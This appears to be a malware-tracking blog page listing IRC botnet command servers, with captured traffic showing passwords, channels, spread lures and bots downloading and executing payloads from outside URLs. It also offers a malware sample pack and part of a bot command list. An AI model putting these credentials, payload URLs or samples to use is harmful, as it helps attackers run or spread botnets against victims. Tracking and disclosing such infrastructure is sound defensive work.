Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 208.117.34.161 1888 PASS strike NICK n{US|XPa}rpgrbzy USER rpgrbzy 0 0 :rpgrbzy JOIN #asdf strike JOIN #XP JOIN #US PRIVMSG #XP :[d=”http://img102.herosh.com/2011/09/23/174023232.gif” s=”81920 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0 hosting infos: http://whois.domaintools.com/208.117.34.161
178.162.148.126(Autumn bot hosted in Germany Frankfurt Netdirect)
Remote Host Port Number 178.162.148.126 4758 NICK [USA-XP-x86]31375 USER unreal 8 * :unreal JOIN #autumn autumn9857 PONG :680356A8 Now talking in #autumn Topic On: [ #autumn ] [] Topic By: [ Red ] hosting infos: http://whois.domaintools.com/178.162.148.126
115mb malware samples
This package contains 115mb of worms,trojans,irc bots,stealers etc have fun searching them Download: http://adf.ly/2rm49 http://adf.ly/2rmAC
Aryan Bot Commands
This bot is spreading around and is same shit as ngrBot here are commands for this crap Please note that this list only contains the default commands and prefix's, remember your commands and prefix and subsitute it accordingly. @Info - Displays the location from where your bot is running from. @Remove - Fully Removes theRead more...
ohaizor.info(ngrBot hosted in United States Morgantown Sharktech Internet Services)
Resolved : [ohaizor.info] To [204.188.221.156] Remote Host Port Number 199.15.234.7 80 63.223.121.212 80 204.188.221.156 3125 PASS .. PRIVMSG #ngr# :[HTTP]: Updated HTTP spread message to “lmao look at this pic http://areeba.dk/images/?IMG3181.jpg” PRIVMSG #ngr# :[DNS]: Blocked 1259 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}wjhczdd USER wjhczdd 0 0 :wjhczdd JOIN #ngr# ngrBot PRIVMSG #ngr# :[MSN]: UpdatedRead more...
46.105.241.160(aryan bot hosted in United Kingdom Ovh Systems)
Remote Host Port Number 199.15.234.7 80 64.62.181.43 80 65.254.248.151 80 46.105.241.160 6667 PASS none or PASS passwd MODE New{US-XP-x86}8220715 +iMm JOIN #xxARYANxx# styggen JOIN #dl PRIVMSG #dl :[AryaN]: Downloading File: “http://ohnull.fileave.com/worm_crypt.exe” PRIVMSG #dl :[AryaN]: Successfully Downloaded File To: “C:Documents and SettingsUserNameApplication Data187831163825520.exe” PRIVMSG #dl :[AryaN]: Successfully Executed Process: “C:Documents and SettingsUserNameApplication Data187831163825520.exe” NICK New{US-XP-x86}8220715 USERRead more...
hackmeh.net(irc botnet hosted in United Kingdom Ovh Systems)
Resolved : [hackmeh.net] To [46.105.241.149] Remote Host Port Number 46.105.241.149 6667 NICK [USA-XP-x86]35857 USER unreal 8 * :unreal JOIN #Net hosting infos: http://whois.domaintools.com/46.105.241.149
193.106.172.80(Aryan bot hosted in Russian Federation Moscow Iqhost Ltd)
Remote Host Port Number 193.106.172.80 7677 PASS mike777% 199.15.234.7 80 JOIN #xxAryaNxx# mike321 NICK New{US-XP-x86}7648370 USER 7648370 “” “7648370” :7648370 MODE New{US-XP-x86}7648370 +iMm PONG :98DB0CE0 PONG :server.khan hosting infos: http://whois.domaintools.com/193.106.172.80
94.23.162.3(irc botnet hosted in Germany Ovh Systems)
Remote Host Port Number 94.23.162.3 6667 PASS 94.23.162.3 MODE [NESv5][USA|XP|LAN|20966] -ixs JOIN #1 NICK [NESv5][USA|XP|LAN|20966] USER NESv5 * 0 :[NESv5][USA|XP|LAN|20966] hosting infos: http://whois.domaintools.com/94.23.162.3
212.7.203.231(ngrBot hosted in Netherlands Amsterdam Dediserv Dedicated Servers Sp. Z O.o)
Remote Host Port Number 199.15.234.7 80 83.233.33.6 80 212.7.203.231 1866 PASS ngrBot PRIVMSG #!hot! :[DNS]: Blocked 1310 domain(s) – Redirected 0 domain(s) NICK n{US|XPa}msujxop USER msujxop 0 0 :msujxop JOIN #!hot! ngrBot PRIVMSG #!hot! :[HTTP]: Updated HTTP spread interval to “3” PRIVMSG #!hot! :[MSN]: Updated MSN spread interval to “2” PRIVMSG #!hot! :[HTTP]: Updated HTTPRead more...